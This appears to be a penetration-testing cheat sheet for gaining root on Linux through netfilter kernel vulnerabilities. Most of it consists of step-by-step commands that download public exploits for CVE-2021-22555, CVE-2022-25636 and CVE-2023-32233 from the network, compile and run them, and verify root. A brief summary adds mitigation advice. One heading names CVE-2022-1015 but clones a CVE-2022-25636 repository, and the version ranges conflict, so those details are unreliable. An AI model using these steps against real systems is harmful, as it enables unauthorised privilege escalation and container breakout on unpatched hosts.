# netfilter It is a linux kernel module that provides, packet filtering, network address translation, and other tolls relevant to firewalls. **Check kernel version** ``` uname -r ``` **Affected version 2.6 - 5.11 (**[**CVE-2021-22555**](https://github.com/google/security-research/tree/master/pocs/linux/cve-2021-22555)**)** ``` wget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c ``` ``` gcc -m32 -static exploit.c -o exploit ``` ``` ./exploit ``` **Affects Linux kernel 5.4 through 5.6.10 (**[**CVE-2022-1015**](https://github.com/pqlx/CVE-2022-1015)**)** ``` git clone https://github.com/Bonfee/CVE-2022-25636.git ``` ``` cd CVE-2022-25636 ``` ``` make ``` ``` ./exploit ``` **Affected Linux Kernel up to version 6.3.1 (**[**CVE-2023-32233**](https://github.com/Liuk3r/CVE-2023-32233)**)** ``` git clone https://github.com/Liuk3r/CVE-2023-32233 ``` ``` cd CVE-2023-32233 ``` ``` gcc -Wall -o exploit exploit.c -lmnl -lnftnl ``` ``` ./exploit ``` *** *** *** #### Check kernel version ```bash uname -r ``` #### Download exploit ```bash wget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c ``` #### Compile exploit (32-bit) ```bash gcc -m32 -static exploit.c -o exploit ``` #### Run exploit ```bash ./exploit ``` #### Verify root access ```bash id whoami ``` ## **Key Concepts:** * **Netfilter:** * Linux kernel framework for packet filtering, NAT, etc. * Core component of Linux firewalls. * **iptables/nftables:** * User-space tools for managing Netfilter rules. * **Vulnerabilities:** * Various vulnerabilities have been found in Netfilter, leading to privilege escalation. * **Use-After-Free:** A common type of vulnerability, where a program attempts to use memory after it has been freed. * **Out-of-bounds write:** A memory safety violation where a program writes data beyond the allocated buffer. **Vulnerabilities and Exploitation:** 1. **CVE-2021-22555:** * Affected kernel versions: 2.6 - 5.11. * Exploitation: * Download and compile the exploit. * Run the exploit. * Mitigation: Update the kernel. 2. **CVE-2022-25636:** * Affected kernel versions: 5.4 - 5.6.10. * Exploitation: * Download and compile the exploit. * Run the exploit. * Warning: This exploit can cause system instability. * Mitigation: Update the kernel. 3. **CVE-2023-32233:** * Affected kernel versions: up to 6.3.1. * Exploits anonymous sets in nftables. * Exploitation: * Download and compile the exploit. * Run the exploit. * Mitigation: Update the kernel. **Important Considerations and Enhancements:** * **Vulnerability Severity:** * These vulnerabilities are critical. * They allow local privilege escalation. * **Patching:** * Kernel updates are essential. * **Exploit Reliability:** * Exploits can be unstable. * System instability or crashes may occur. * **Real-World Scenarios:** * Emphasize the risks in production environments. * Older, unpatched systems are highly vulnerable. * **Container Security:** * Highlight the importance of kernel security in containerized environments. * Container breakout is possible if the host kernel is vulnerable. * **Detection:** * Monitor for suspicious Netfilter activity. * Use intrusion detection systems. * **Kernel versions:** Always make sure the exploit is compatible with the target kernel. * **Netfilter deep dive:** More information could be provided about the inner workings of netfilter.